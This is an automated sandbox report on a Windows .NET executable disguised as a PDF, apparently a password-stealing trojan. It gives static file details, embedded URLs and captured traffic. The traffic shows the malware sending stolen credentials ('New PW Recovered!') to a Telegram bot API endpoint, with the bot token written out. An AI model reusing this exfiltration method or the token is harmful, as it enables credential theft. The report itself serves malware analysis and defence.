                                                unknown
                                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip20220114080343434.pdf.exe, 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.typography.net(20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284090445.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284056869.0000000005CEB000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                low
                                                http://www.tiro.com5v20220114080343434.pdf.exe, 00000000.00000003.286315824.0000000005CFA000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286249935.0000000005CEB000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fontbureau.com/designersr20220114080343434.pdf.exe, 00000000.00000003.292082396.0000000005CEF000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.apache.org/licenses/LICENSE-2.020220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286760496.0000000005D03000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286824795.0000000005D04000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286816564.0000000005D03000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286767765.0000000005D04000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286924962.0000000005D03000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286942039.0000000005D04000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.com20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://DynDns.comDynDNSRegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers/frere-jones.htmld20220114080343434.pdf.exe, 00000000.00000003.291358079.0000000005CEF000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.sajatypeworks.coms20220114080343434.pdf.exe, 00000000.00000003.282987555.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.282954072.0000000005CF3000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.founder.com.cn/cnTC20220114080343434.pdf.exe, 00000000.00000003.285705421.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285739553.0000000005CF8000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285783264.0000000005CEB000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://xXcVm5kmD6Gyza.orgRegSvcs.exe, 00000008.00000002.557166211.00000000036A7000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.fontbureau.coma20220114080343434.pdf.exe, 00000000.00000002.311680143.0000000001397000.00000004.00000040.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://en.w20220114080343434.pdf.exe, 00000000.00000003.283290825.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283152648.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283208748.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283182173.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283259509.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283123679.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283244194.0000000005CEB000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.ipify.org%$RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        low
                                                        http://www.carterandcone.coml20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.founder.com.cn/cn/20220114080343434.pdf.exe, 00000000.00000003.286054163.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285976448.0000000005CEB000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers/cabarga.htmlN20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cn20220114080343434.pdf.exe, 00000000.00000003.286249935.0000000005CEB000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers/frere-jones.html20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://www.fontbureau.com/designers/cabarga.html20220114080343434.pdf.exe, 00000000.00000003.291923026.0000000005CEF000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.founder.com.cn/cn920220114080343434.pdf.exe, 00000000.00000003.285705421.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285739553.0000000005CF8000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285783264.0000000005CEB000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.jiyu-kobo.co.jp/20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.carterandcone.comn-u/20220114080343434.pdf.exe, 00000000.00000003.287041681.0000000005CEB000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.sandoll.co.krr-t20220114080343434.pdf.exe, 00000000.00000003.285400973.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285455774.0000000005CF8000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.fontbureau.com/designers820220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291435256.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291398360.0000000005CEF000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://www.galapagosdesign.com/staff/dennis.htmNp20220114080343434.pdf.exe, 00000000.00000003.294959412.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295250238.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295114414.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295200642.0000000005CEB000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.carterandcone.comesS20220114080343434.pdf.exe, 00000000.00000003.286900771.0000000005CEB000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.typography.netiv20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284090445.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284056869.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284128821.0000000005CEB000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.urwpp.dem20220114080343434.pdf.exe, 00000000.00000003.290669314.0000000005CFB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290625115.0000000005CF9000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://fontfabrik.com(20220114080343434.pdf.exe, 00000000.00000003.283914641.0000000005CEB000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                low
                                                                http://api.telegram.orgRegSvcs.exe, 00000008.00000002.557264398.0000000003712000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://www.fontbureau.com/designers/d20220114080343434.pdf.exe, 00000000.00000003.290817792.0000000005CF2000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://www.sandoll.co.kru-hX20220114080343434.pdf.exe, 00000000.00000003.285325370.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285266662.0000000005CEB000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.tiro.comic20220114080343434.pdf.exe, 00000000.00000003.287143704.0000000005CEB000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designers/20220114080343434.pdf.exe, 00000000.00000003.290817792.0000000005CF2000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://www.micro.20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.urwpp.dec20220114080343434.pdf.exe, 00000000.00000003.292495353.0000000005CEF000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown

                                                                      Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      149.154.167.220
                                                                      api.telegram.orgUnited Kingdom
                                                                      62041TELEGRAMRUfalse

                                                                      Private

                                                                      IP
                                                                      192.168.2.1

                                                                      General Information

                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                      Analysis ID:553218
                                                                      Start date:14.01.2022
                                                                      Start time:13:53:00
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 9m 24s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:light
                                                                      Sample file name:20220114080343434.pdf.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:24
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@5/1@1/2
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HDC Information:Failed
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 0
                                                                      • Number of non-executed functions: 0
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe
                                                                      Warnings:
                                                                      Show All
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • VT rate limit hit for: 20220114080343434.pdf.exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      13:54:02API Interceptor1x Sleep call for process: 20220114080343434.pdf.exe modified
                                                                      13:54:16API Interceptor741x Sleep call for process: RegSvcs.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      No context

                                                                      Domains

                                                                      No context

                                                                      ASN

                                                                      No context

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\20220114080343434.pdf.exe.log
                                                                      Process:C:\Users\user\Desktop\20220114080343434.pdf.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1310
                                                                      Entropy (8bit):5.345651901398759
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x847mE4P:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzQ
                                                                      MD5:A9EFF9253CAF99EC8665E41D736DDAED
                                                                      SHA1:D95BB4ABC856D774DA4602A59DE252B4BF560530
                                                                      SHA-256:DBC637B33F1F3CD1AB40AFED23F94C4571CA43621EBB52C5DC267DBDC52D4783
                                                                      SHA-512:96B67A84B750589BDB758224641065919F34BBF02BB286B9F5D566B48965A0E38FB88308B61351A6E11C46B76BFEC370FBC8B978A9F0F07A847567172D5CA5F3
                                                                      Malicious:true
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.224593030373487
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:20220114080343434.pdf.exe
                                                                      File size:589824
                                                                      MD5:cd9290d22bb18ced32a1b81814888382
                                                                      SHA1:83b1ce896dca71d611232fe4197cbe3993cccf64
                                                                      SHA256:3876b600bafaaaf0a580e3925b9851c1c82ea16b40fb6b2b127296a523cf86fd
                                                                      SHA512:1c2c1b126910aad08d6434ed65c49d10e24c3fa79463ec7829ebc6dc4f3601020edaa0d07e7a60c12faec39c557ae4ecafe5804ac324231ff8cf3f4d8d8e7b23
                                                                      SSDEEP:12288:SccK777777777777N7cPGR72wUjuf/R9nkIE9NciKpSj1kv6e:CK777777777777lcudvUjuX7S+8kv
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5O.a............................>.... ... ....@.. .......................`............@................................

                                                                      File Icon

                                                                      Icon Hash:00828e8e8686b000

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x49143e
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                      Time Stamp:0x61E14F35 [Fri Jan 14 10:23:49 2022 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:v4.0.30319
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x913f00x4b.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x920000x5e4.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x940000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x913a50x1c.text
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000x8f4440x8f600False0.755026700087data7.23442041847IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x920000x5e40x600False0.439453125data4.1825921697IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x940000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_VERSION0x920a00x356data
                                                                      RT_MANIFEST0x923f80x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                      Imports

                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain

                                                                      Version Infos

                                                                      DescriptionData
                                                                      Translation0x0000 0x04b0
                                                                      LegalCopyright2022 Tradewell
                                                                      Assembly Version22.0.0.0
                                                                      InternalNameWellKnownSidTy.exe
                                                                      FileVersion1.1.0.0
                                                                      CompanyNameTradewell ltd
                                                                      LegalTrademarks
                                                                      CommentsPurple Org
                                                                      ProductNameBlaster
                                                                      ProductVersion1.1.0.0
                                                                      FileDescriptionBlaster
                                                                      OriginalFilenameWellKnownSidTy.exe

                                                                      Network Behavior

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 14, 2022 13:55:40.908617020 CET49830443192.168.2.3149.154.167.220
                                                                      Jan 14, 2022 13:55:40.908689022 CET44349830149.154.167.220192.168.2.3
                                                                      Jan 14, 2022 13:55:40.908845901 CET49830443192.168.2.3149.154.167.220
                                                                      Jan 14, 2022 13:55:40.955703020 CET49830443192.168.2.3149.154.167.220
                                                                      Jan 14, 2022 13:55:40.955754042 CET44349830149.154.167.220192.168.2.3
                                                                      Jan 14, 2022 13:55:41.027682066 CET44349830149.154.167.220192.168.2.3
                                                                      Jan 14, 2022 13:55:41.027829885 CET49830443192.168.2.3149.154.167.220
                                                                      Jan 14, 2022 13:55:41.034490108 CET49830443192.168.2.3149.154.167.220
                                                                      Jan 14, 2022 13:55:41.034508944 CET44349830149.154.167.220192.168.2.3
                                                                      Jan 14, 2022 13:55:41.034826040 CET44349830149.154.167.220192.168.2.3
                                                                      Jan 14, 2022 13:55:41.080782890 CET49830443192.168.2.3149.154.167.220
                                                                      Jan 14, 2022 13:55:41.476592064 CET49830443192.168.2.3149.154.167.220
                                                                      Jan 14, 2022 13:55:41.503665924 CET44349830149.154.167.220192.168.2.3
                                                                      Jan 14, 2022 13:55:41.507227898 CET49830443192.168.2.3149.154.167.220
                                                                      Jan 14, 2022 13:55:41.553879976 CET44349830149.154.167.220192.168.2.3
                                                                      Jan 14, 2022 13:55:41.586333036 CET44349830149.154.167.220192.168.2.3
                                                                      Jan 14, 2022 13:55:41.586447954 CET44349830149.154.167.220192.168.2.3
                                                                      Jan 14, 2022 13:55:41.586533070 CET49830443192.168.2.3149.154.167.220
                                                                      Jan 14, 2022 13:55:41.589318037 CET49830443192.168.2.3149.154.167.220

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 14, 2022 13:55:40.857312918 CET6035253192.168.2.38.8.8.8
                                                                      Jan 14, 2022 13:55:40.877934933 CET53603528.8.8.8192.168.2.3

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Jan 14, 2022 13:55:40.857312918 CET192.168.2.38.8.8.80x29a1Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Jan 14, 2022 13:55:40.877934933 CET8.8.8.8192.168.2.30x29a1No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • api.telegram.org

                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.349830149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      2022-01-14 12:55:41 UTC0OUTPOST /bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=---------------------------8d9d77ee3312256
                                                                      Host: api.telegram.org
                                                                      Content-Length: 1009
                                                                      Expect: 100-continue
                                                                      Connection: Keep-Alive
                                                                      2022-01-14 12:55:41 UTC0INHTTP/1.1 100 Continue
                                                                      2022-01-14 12:55:41 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 64 37 37 65 65 33 33 31 32 32 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 32 31 32 34 37 39 38 37 37 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 64 37 37 65 65 33 33 31 32 32 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 68 61 72 64 7a 2f 31 32 33 37 31 36 0a 4f 53 46 75 6c 6c
                                                                      Data Ascii: -----------------------------8d9d77ee3312256Content-Disposition: form-data; name="chat_id"2124798776-----------------------------8d9d77ee3312256Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/123716OSFull
                                                                      2022-01-14 12:55:41 UTC1INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0
                                                                      Date: Fri, 14 Jan 2022 12:55:41 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 631
                                                                      Connection: close
                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
